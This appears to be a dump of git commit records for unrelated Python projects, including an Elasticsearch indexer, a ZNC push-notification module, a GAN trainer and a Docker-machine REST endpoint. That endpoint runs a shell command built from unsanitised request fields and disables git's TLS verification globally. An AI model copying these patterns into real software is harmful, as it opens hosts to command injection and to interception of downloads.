- if validator.choices:%0A
@@ -2519,20 +2519,16 @@
hoices)%0A
-
sche
|
eb71d45097e509273518b83113489911bf985e4a
|
clean up
|
mcpipy/test/builders/test_protein.py
|
mcpipy/test/builders/test_protein.py
|
import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
dict_chains = {"a": 1, "b": 2}
d_appearance = define_items_color_texture_protein(dict_chains)
assert len(d_appearance) == 2
assert d_appearance[1]['color'] != d_appearance[2]['color']
def test_store_location_biological_prot_data():
complex_coordinates = pd.Series([0.03, 0.45, 0.23])
name = '1jsu'
data_dict = store_location_biological_prot_data(complex_coordinates, name)
|
Python
| 0.000001
|
@@ -377,205 +377,4 @@
r'%5D%0A
-%0Adef test_store_location_biological_prot_data():%0A complex_coordinates = pd.Series(%5B0.03, 0.45, 0.23%5D)%0A name = '1jsu'%0A data_dict = store_location_biological_prot_data(complex_coordinates, name)
|
34c901455f539ec9860c7704cc5f8cc8a09a8bca
|
Remove excessive logging from indexing script
|
scripts/process-g6-into-elastic-search.py
|
scripts/process-g6-into-elastic-search.py
|
#!/usr/bin/python
'''Process G6 JSON files into elasticsearch
This version reads JSON from disk or DM API and transforms this into the format
expected by the DM search.
Usage:
process-g6-into-elastic-search.py <es_endpoint> <dir_or_endpoint> [<token>]
Arguments:
es_endpoint Full ES index URL
dir_or_endpoint Directory path to import or an API URL if token is given
token Digital Marketplace API token
'''
import os
import sys
import json
import urllib2
CATEGORY_MAPPINGS = {
'Accounting and finance': '110',
'Business intelligence and analytics': '111',
'Collaboration': '112',
'Telecoms': '113',
'Customer relationship management (CRM)': '114',
'Creative and design': '115',
'Data management': '116',
'Sales': '117',
'Software development tools': '118',
'Electronic document and records management (EDRM)': '119',
'Human resources and employee management': '120',
'IT management': '121',
'Marketing': '122',
'Operations management': '123',
'Project management and planning': '124',
'Security': '125',
'Libraries': '126',
'Schools and education': '127',
'Energy and environment': '128',
'Healthcare': '129',
'Legal': '130',
'Transport and logistics': '131',
'Unlisted': '132',
'Compute': '133',
'Storage': '134',
'Other': '135',
'Platform as a service': '136',
'Planning': '137',
'Implementation': '138',
'Testing': '139',
'Training': '140',
'Ongoing support': '141',
'Specialist Cloud Services': '142'
}
def category_name_to_id(name):
return CATEGORY_MAPPINGS[name]
def g6_to_g5(data):
"""
Mappings
description == serviceSummary
name == serviceName
listingId == id
uniqueName == id
tags == []
enable == true
"""
categories = [category_name_to_id(t) for t in data.get('serviceTypes', [])]
return {
'uniqueName': data['id'],
'tags': data['lot'],
'name': data['serviceName'],
'listingId': str(data['id']),
'description': data['serviceSummary'],
'enabled': True,
'expired': False,
'details': {
'supplierId': data['supplierId'],
'lot': data['lot'],
'categories': categories,
'features': data['serviceFeatures'],
'benefits': data['serviceBenefits']
}
}
def post_to_es(es_endpoint, data):
handler = urllib2.HTTPHandler()
opener = urllib2.build_opener(handler)
json_data = g6_to_g5(data)
if not es_endpoint.endswith('/'):
es_endpoint += '/'
request = urllib2.Request(es_endpoint + json_data['listingId'],
data=json.dumps(json_data))
request.add_header("Content-Type", 'application/json')
print request.get_full_url()
print request.get_data()
try:
connection = opener.open(request)
except urllib2.HTTPError, e:
connection = e
print connection
# check. Substitute with appropriate HTTP code.
if connection.code == 200:
data = connection.read()
print str(connection.code) + " " + data
else:
print "connection.code = " + str(connection.code)
def request_services(endpoint, token):
handler = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(handler)
page_url = endpoint
while page_url:
print "requesting {}".format(page_url)
request = urllib2.Request(page_url)
request.add_header("Authorization", "Bearer {}".format(token))
response = opener.open(request).read()
data = json.loads(response)
for service in data["services"]:
yield service
page_url = filter(lambda l: l['rel'] == 'next', data['links'])
if page_url:
page_url = page_url[0]['href']
def process_json_files_in_directory(dirname):
for filename in os.listdir(dirname):
with open(os.path.join(dirname, filename)) as f:
data = json.loads(f.read())
print "doing " + filename
yield data
def main():
if len(sys.argv) == 4:
es_endpoint, endpoint, token = sys.argv[1:]
for data in request_services(endpoint, token):
post_to_es(es_endpoint, data)
elif len(sys.argv) == 3:
es_endpoint, listing_dir = sys.argv[1:]
for data in process_json_files_in_directory(listing_dir):
post_to_es(es_endpoint, data)
else:
print __doc__
if __name__ == '__main__':
main()
|
Python
| 0
|
@@ -2834,431 +2834,98 @@
-print request.get_full_url()%0A print request.get_data()%0A%0A try:%0A connection = opener.open(request)%0A except urllib2.HTTPError, e:%0A connection = e%0A print connection%0A%0A # check. Substitute with appropriate HTTP code.%0A if connection.code == 200:%0A data = connection.read()%0A print str(connection.code) + %22 %22 + data%0A else:%0A print %22connection.code = %22 + str(connection.code)
+try:%0A opener.open(request)%0A except urllib2.HTTPError, error:%0A print error
%0A%0A%0Ad
@@ -3114,18 +3114,24 @@
nt %22
-request
+process
ing
+ page:
%7B%7D%22
|
237f85009e2d8669e75c1e7e9ae3940efe7a151d
|
update vetn version and pull recursively
|
vcontrol/rest/machines/create.py
|
vcontrol/rest/machines/create.py
|
from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
"""
This endpoint is for creating a new machine of Vent on a provider.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def OPTIONS(self):
return self.POST()
def POST(self):
web.header('Access-Control-Allow-Origin', self.allow_origin)
web.header('Access-Control-Allow-Headers', "Content-type")
data = web.data()
payload = {}
try:
payload = ast.literal_eval(data)
if type(payload) != dict:
payload = ast.literal_eval(json.loads(data))
except:
return "malformed json body"
# TODO add --engine-label(s) vent specific labels
engine_labels = "--engine-label vcontrol_managed=yes "
try:
if os.path.isfile('providers.txt'):
with open('providers.txt', 'r') as f:
for line in f:
if line.split(":")[0] == payload['provider']:
# add --engine-label for group specified in payload
if "group" in payload:
engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
# !! TODO add any additional --engine-label(s) in payload
if "labels" in payload:
if payload["labels"] != "":
labels = payload["labels"].split(",")
for label in labels:
engine_labels += "--engine-label "+label+" "
proc = None
cleanup = False
if line.split(":")[1] == 'openstack' or line.split(":")[1] == 'vmwarevsphere':
# TODO check usage stats first and make sure it's not over the limits (capacity)
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[5].strip()
if line.split(":")[1] == 'vmwarevsphere':
if payload['iso'] == '/tmp/vent/vent.iso':
cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.0/vent.iso'
else:
cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
elif line.split(":")[1].strip() == "virtualbox":
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1].strip()
if payload['iso'] == '/tmp/vent/vent.iso':
if not os.path.isfile('/tmp/vent/vent.iso'):
cleanup = True
os.system("git config --global http.sslVerify false")
os.system("cd /tmp && git clone https://github.com/CyberReboot/vent.git")
os.system("cd /tmp/vent && make")
proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
else:
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[2].strip()
if line.split(":")[1] == "vmwarevsphere":
cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
cmd += ' '+payload['machine']
output = subprocess.check_output(cmd, shell=True)
if proc != None:
os.system("kill -9 "+str(proc.pid))
if cleanup:
shutil.rmtree('/tmp/vent')
return output
return "provider specified was not found"
else:
return "no providers, please first add a provider"
except:
return "unable to create machine"
|
Python
| 0
|
@@ -2458,17 +2458,17 @@
ad/v0.1.
-0
+1
/vent.is
@@ -3190,16 +3190,28 @@
t clone
+--recursive
https://
|
be929d518ff320ed8e16f57da55f0855800f7408
|
Use mutli_reduce instead of reduce in enum file loading
|
src/engine/file_loader.py
|
src/engine/file_loader.py
|
import os
import json
from lib import contract
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
def read_and_parse_json(data_type):
sub_dir = os.path.join(data_dir, data_type)
def full_path(file_name):
return os.path.join(sub_dir, file_name)
def only_json(file_name):
return file_name.endswith('.json')
def load_json(json_file_name):
with open(json_file_name) as json_file:
return json.load(json_file)
return map(load_json, filter(only_json, map(full_path, os.listdir(sub_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
def create_enum_map(enum_map, args):
enumeration, enum_type = args
enum_map[str(enum_type)] = enumeration
return enum_map
return reduce(create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
def create_struct_map(struct_map, struct_):
struct_map[str(struct_['name'])] = struct_
return struct_map
return reduce(create_struct_map, read_and_parse_json(struct_name), {})
|
Python
| 0
|
@@ -40,16 +40,28 @@
contract
+, functional
%0A%0Adata_d
@@ -715,23 +715,8 @@
map,
- args):%0A
enu
@@ -738,15 +738,10 @@
type
- = args
+):
%0A
@@ -816,31 +816,57 @@
%0A return
-reduce(
+functional.multi_reduce(%0A
create_enum_
|
a429ce49dc5ed823a33c5a4fa64bd92b422b9b10
|
change imports
|
BEGAN/train.py
|
BEGAN/train.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
import time
import began
import sys
sys.path.insert(0, '../')
import datasets
import image_utils as iu
dirs = {
'sample_output': './BEGAN/',
'checkpoint': './model/checkpoint',
'model': './model/BEGAN-model.ckpt'
}
paras = {
'epoch': 250,
'batch_size': 16,
'logging_interval': 1000
}
def main():
start_time = time.time() # clocking start
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.95)
config = tf.ConfigProto(allow_soft_placement=True, gpu_options=gpu_options)
with tf.Session(config=config) as s:
end_time = time.time() - start_time
# BEGAN Model
model = began.BEGAN(s)
# initializing
s.run(tf.global_variables_initializer())
# load model & graph & weight
ckpt = tf.train.get_checkpoint_state('./model/')
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
model.saver.restore(s, ckpt.model_checkpoint_path)
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
print("[+] global step : %s" % global_step, " successfully loaded")
else:
global_step = 0
print('[-] No checkpoint file found')
# return
# initializing variables
tf.global_variables_initializer().run()
# loading Celeb-A dataset
ds = datasets.DataSet(input_height=64,
input_width=64,
input_channel=64,
dataset_name="celeb-a")
images = ds.images
sample_z = np.random.uniform(-1., 1., size=(model.sample_num, model.z_dim)).astype(np.float32)
d_overpowered = False
kt = tf.Variable(0., dtype=tf.float32) # init K_0 value, 0
batch_per_epoch = int(len(images) / paras['batch_size'])
for epoch in range(paras['epoch']):
for step in range(batch_per_epoch):
iter_ = datasets.DataIterator([images], paras['batch_size'])
# k_t update
# k_t+1 = K_t + lambda_k * (gamma * d_real - d_fake)
kt = kt + model.lambda_k * (model.gamma * model.D_real - model.D_fake)
# z update
batch_z = np.random.uniform(-1., 1., [paras['batch_size'], model.z_dim]).astype(np.float32)
# update D network
if not d_overpowered:
s.run(model.d_op, feed_dict={model.x: 0,
model.z: batch_z,
model.kt: kt})
# update G network
s.run(model.g_op, feed_dict={model.z: batch_z,
model.kt: kt})
if global_step % paras['logging_interval'] == 0:
batch_z = np.random.uniform(-1., 1., [paras['batch_size'], model.z_dim]).astype(np.float32)
d_loss, g_loss, summary = s.run([
model.d_loss,
model.g_loss,
model.merged
], feed_dict={
model.x: 0,
model.z: batch_z
})
# print loss
print("[+] Epoch %03d Step %05d => " % (epoch, step),
"D loss : {:.8f}".format(d_loss), " G loss : {:.8f}".format(g_loss))
# update overpowered
d_overpowered = d_loss < g_loss / 3
# training G model with sample image and noise
samples = s.run(model.G, feed_dict={
model.x: 0,
model.z: sample_z
})
# summary saver
model.writer.add_summary(summary, step)
# export image generated by model G
sample_image_height = model.sample_size
sample_image_width = model.sample_size
sample_dir = dirs['sample_output'] + 'train_{0}_{1}.png'.format(epoch, step)
# Generated image save
iu.save_images(samples, size=[sample_image_height, sample_image_width], image_path=sample_dir)
# model save
model.saver.save(s, dirs['model'], global_step=step)
global_step += 1
# elapsed time
print("[+] Elapsed time {:.8f}s".format(end_time))
# close tf.Session
s.close()
if __name__ == '__main__':
main()
|
Python
| 0.000001
|
@@ -215,23 +215,50 @@
')%0A%0A
-import datas
+from datasets import DataIterator, DataS
et
-s
%0Aimp
@@ -1564,25 +1564,16 @@
ds =
-datasets.
DataSet(
@@ -1606,33 +1606,24 @@
-
input_width=
@@ -1643,33 +1643,24 @@
-
-
input_channe
@@ -1661,29 +1661,19 @@
channel=
-64,%0A
+3,%0A
|
ecc21e3fccc41413686389735da93e0488779cc4
|
Add a test command
|
pypush.py
|
pypush.py
|
# Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
module_types = [znc.CModInfo.UserModule]
description = "Push python3 module for ZNC"
def OnLoad(self, sArgs, sMessage):
self.nick = ''
self.debug = False
return znc.CONTINUE
def PutModuleDbg(self, s):
if self.debug:
self.PutModule(s)
def PushMsg(self, title, msg):
self.PutModuleDbg("{0} -- {1}".format(title, msg))
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": self.nv['token'],
"user": self.nv['user'],
"title": title,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
def Highlight(self, message):
if self.nick != self.GetNetwork().GetCurNick():
self.nick = self.GetNetwork().GetCurNick()
words = [self.nick, ] + self.nv['highlight'].split()
self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
return self.HighlightRE(message)
def OnChanMsg(self, nick, channel, message):
if self.Highlight(message.s):
self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
return znc.CONTINUE
def OnPrivMsg(self, nick, message):
self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
return znc.CONTINUE
def OnModCommand(self, commandstr):
argv = commandstr.split()
try:
self.PutModule("Command!! {0}".format(argv))
method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
method(argv)
except Exception:
self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
return znc.CONTINUE
def DoCommandNotUnderstood(self, argv):
self.PutModule("Command Not Understood: {0}".format(argv))
def DoCommand_setuser(self, argv):
try:
self.nv['user'] = argv[1]
self.PutModule("Pushover user set")
except Exception:
self.PutModule("SetUser requires a Pushover user string");
def DoCommand_settoken(self, argv):
try:
self.nv['token'] = argv[1]
self.PutModule("Pushover token set")
except Exception:
self.PutModule("SetToken requires a Pushover token string");
def DoCommand_sethighlight(self, argv):
self.nv['highlight'] = ' '.join(argv[1:])
self.nick = '' # unset the nick to regenerate the re
def DoCommand_debug(self, argv):
self.debug = not self.debug
self.PutModule("Debug {0}".format(self.debug));
|
Python
| 0.000797
|
@@ -3004,9 +3004,137 @@
bug));%0A%0A
+ def DoCommand_test(self, argv):%0A self.PushMsg(%22Test%22, %22%7B0%7D%22.format(' '.join(argv%5B0:%5D)))%0A return znc.CONTINUE%0A%0A
%0A
|
9d74f2ebfc0a635026544a977380593e90b4150d
|
upgrade (goflow.workflow indepency)
|
leavedemo/urls.py
|
leavedemo/urls.py
|
from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
|
Python
| 0
|
@@ -2808,24 +2808,33 @@
ude('goflow.
+apptools.
urls_admin')
|
1df66cc442e93d85fd8a8bbab2815574387a8952
|
Remove print
|
doc/examples/brain_extraction_dwi.py
|
doc/examples/brain_extraction_dwi.py
|
"""
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medostu` returns the segmented brain data an a binary mask of the brain.
It is possible to fine tune the `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
print('Segmenting brain data from GE 3T b0 volume...')
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the results middle slice using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medostu` can also automaticaly crop the outputs to remove the largest possible
number of backgroud voxels. This makes outputted data significantly smaller.
`medostu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
|
Python
| 0.000016
|
@@ -1114,63 +1114,8 @@
%22%22%0A%0A
-print('Segmenting brain data from GE 3T b0 volume...')%0A
from
|
51b716cc00efd0d0c93ffc11f4cd7242446bad88
|
Remove unused pyrax import
|
nodes/management/commands/create_images.py
|
nodes/management/commands/create_images.py
|
from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger, pyrax
class Command(BaseCommand):
help = 'create nodes images'
def handle(self, *args, **kwargs):
self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
self._create_image('raw')
tasks = [
gevent.spawn(self._create_image, image, image_name='raw')
for image in os.listdir(self._root) if image != 'raw'
]
gevent.joinall(tasks)
def _create_image(self, name, **kwargs):
"""Create image"""
image_root = os.path.join(self._root, name)
with connect_to_node(**kwargs) as node:
node.put(image_root, '/root/{name}/'.format(name=name))
out = node.execute('''
cd /root/{name}/
bash bootstrap.sh
'''.format(name=name))
logger.info(out.stdout)
logger.info(out.stderr)
node.save_image(name)
|
Python
| 0
|
@@ -191,15 +191,8 @@
gger
-, pyrax
%0A%0A%0Ac
|
9ca88c5cd7f52c6f064a1d5edb003471f6223a74
|
Change lable on click
|
Winston.py
|
Winston.py
|
import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.title = 'Winston'
self.setWindowTitle(self.title)
self.setGeometry(100,100,800,400)
self.btn = QPushButton('', self)
self.alexaService = AlexaService()
self.messenger = getMessenger()
self.initUI()
def initUI(self):
b = QLabel(self)
b.setText("Hi, I am Winston. How can I help you?")
b.move(50,40)
self.btn.setCheckable(True)
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setIconSize(QSize(150,150))
self.btn.setObjectName("Alexa")
self.btn.move(100,70)
self.btn.pressed.connect(self.on_press)
self.btn.released.connect(self.on_release)
self.btn.clicked.connect(self.on_click)
self.show()
@pyqtSlot()
def on_click(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
@pyqtSlot()
def on_press(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
self.btn.setCheckable(False);
self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
@pyqtSlot()
def on_release(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setCheckable(True);
self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = QTApp()
app.exec_()
delMessenger()
sys.exit()
|
Python
| 0
|
@@ -197,18 +197,17 @@
idget):%0A
-
%0A
+
def
@@ -521,18 +521,17 @@
nitUI()%0A
-
%0A
+
def
@@ -552,17 +552,26 @@
-b
+self.label
= QLabe
@@ -586,17 +586,26 @@
-b
+self.label
.setText
@@ -654,17 +654,26 @@
-b
+self.label
.move(50
@@ -1035,16 +1035,40 @@
click)%0A
+ self.bool = False
%0A
@@ -1080,18 +1080,17 @@
.show()%0A
-
%0A
+
@pyq
@@ -1152,32 +1152,276 @@
= self.sender()%0A
+ %0A # TODO%0A if not self.bool:%0A self.label.setText('listening ...')%0A self.bool = True%0A else:%0A self.label.setText(%22Hi, I am Winston. How can I help you?%22)%0A self.bool = False%0A%0A
data = %7B
@@ -1515,34 +1515,33 @@
_CLICKED, data)%0A
-
%0A
+
@pyqtSlot()%0A
@@ -1818,18 +1818,17 @@
, data)%0A
-
%0A
+
@pyq
@@ -2116,18 +2116,17 @@
, data)%0A
-
%0A
+
if __nam
@@ -2225,24 +2225,24 @@
Messenger()%0A
+
sys.exit
@@ -2244,9 +2244,8 @@
.exit()%0A
-%0A
|
3ced845c7735cbeb67077d8934768370545b2535
|
Set nodata value for output tiff.
|
code/readDTM.py
|
code/readDTM.py
|
# The MIT License (MIT)
# Copyright (c) 2014 Hishiv Shah
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import ogr
import shapely
import shapely.wkt
import shapely.ops
import os
import glob
import zipfile
import tempfile
import sys
import shutil
import subprocess
def readWelshDistricts(districtsShp, districtNames):
''' Read in list of district names and shapefile of district
boundaries. Returns list of WKT geometries.'''
dataSource = ogr.Open(districtsShp)
layer = dataSource.GetLayer()
layer.SetAttributeFilter("NAME IN ('%s')" % "','".join(districtNames))
geoms = []
for feature in layer:
geom = feature.GetGeometryRef().ExportToWkt()
geoms.append(geom)
return geoms
def readCatchments(catchmentsShp):
''' Read in catchments shapefiles. Returns list of WKT geometries.'''
dataSource = ogr.Open(catchmentsShp)
layer = dataSource.GetLayer()
geoms = []
for feature in layer:
geom = feature.GetGeometryRef().ExportToWkt()
geoms.append(geom)
return geoms
def readGrid(gridShp, clipper):
''' Reads in grid squares. Returns list of tile names.'''
dataSource = ogr.Open(gridShp)
layer = dataSource.GetLayer()
layer.SetSpatialFilter(ogr.CreateGeometryFromWkt(clipper))
tiles = []
for feature in layer:
tileName = feature.GetField("TILE_NAME")
tiles.append(tileName)
return tiles
def createDtmTiff(asciiDir, tileList, outTiff):
'''Extracts ESRI ASCII GRID files for specified tiles, merges and
outputs to specified tiff file.'''
# Extract DTM ascii files to temporary directory
tmpDir = tempfile.mkdtemp()
try:
for tile in tileList:
zipPath = glob.glob(os.path.join(asciiDir,
"%s" % tile[:2].lower(),
"%s*.zip" % tile.lower()))[0]
with zipfile.ZipFile(zipPath) as zFile:
zFile.extractall(tmpDir)
# Run gdal merge
subprocess.check_call(["python", "C:/OSGeo4W64/bin/gdal_merge.py",
"-o", outTiff,
"-co", "COMPRESS=LZW"] \
+ glob.glob(os.path.join(tmpDir, "*.asc")))
finally:
# Delete temporary directory
shutil.rmtree(tmpDir)
if __name__ == "__main__":
# District shapefile path
dstShp = "../data/2014-11-14/meridian2_national_653496/district_region.shp"
# Welsh district names
districtNames = ['GWYNEDD - GWYNEDD',
'SIR Y FFLINT - FLINTSHIRE',
'CASNEWYDD - NEWPORT',
'SIR YNYS MON - ISLE OF ANGLESEY',
'MERTHYR TUDFUL - MERTHYR TYDFIL',
'SIR BENFRO - PEMBROKESHIRE',
'BRO MORGANNWG - THE VALE OF GLAMORGAN',
'WRECSAM - WREXHAM',
'TOR-FAEN - TORFAEN',
'CASTELL-NEDD PORT TALBOT - NEATH PORT TALBOT',
'SIR FYNWY - MONMOUTHSHIRE',
'CAERFFILI - CAERPHILLY',
'PEN-Y-BONT AR OGWR - BRIDGEND',
'BLAENAU GWENT - BLAENAU GWENT',
'POWYS - POWYS',
'CONWY - CONWY',
'SIR DDINBYCH - DENBIGHSHIRE',
'RHONDDA CYNON TAF - RHONDDA CYNON TAF',
'SIR GAERFYRDDIN - CARMARTHENSHIRE',
'SIR CEREDIGION - CEREDIGION',
'ABERTAWE - SWANSEA',
'CAERDYDD - CARDIFF']
# Catchments shapefile
catchmentsShp = "../data/2014-11-14/nrfa/NRFA Catchment Boundary Retrieval/NRFA Catchment Boundary Retrieval_Hishiv Shah.shp"
# Grid squares shapefile
gridShp = "../data/2014-11-14/gb-grids_654971/10km_grid_region.shp"
# DTM data folder
dtmDir = "../data/2014-11-14/terr50_gagg_gb/data"
# Out tiff
outTiff = "../results/osTerrain50.tif"
# Read in district and catchment geometry
districts = readWelshDistricts(dstShp, districtNames)
catchments = readCatchments(catchmentsShp)
# Dissolve district and catchment polygons to create clipper geometry
polys = [shapely.wkt.loads(wktGeom) for wktGeom in (districts + catchments)]
clipper = shapely.ops.unary_union(polys).wkt
# Read tile names
tiles = readGrid(gridShp, clipper)
# Merge DTM tiles, output to tiff file
createDtmTiff(dtmDir, tiles, outTiff)
|
Python
| 0
|
@@ -3153,16 +3153,69 @@
utTiff,%0A
+ %22-a_nodata%22, %22-9999%22,%0A
|
2f31a1f0745214c2b06dadc1258926f7440d429f
|
Set datetime output format to ISO8601
|
abe/app.py
|
abe/app.py
|
#!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
